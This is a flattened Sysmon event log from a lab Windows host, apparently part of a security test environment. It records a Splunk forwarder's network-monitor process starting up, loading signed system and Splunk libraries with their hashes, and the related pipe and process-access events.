19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001605710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605697Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605696Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605695Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605694Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605693Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605692Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605691Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605690Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605689Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001605688Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000001605685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001605684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001605683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605682Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605681Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605680Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x80000000000000001605679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.048{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.048{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x80000000000000001605674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001605848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.720{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 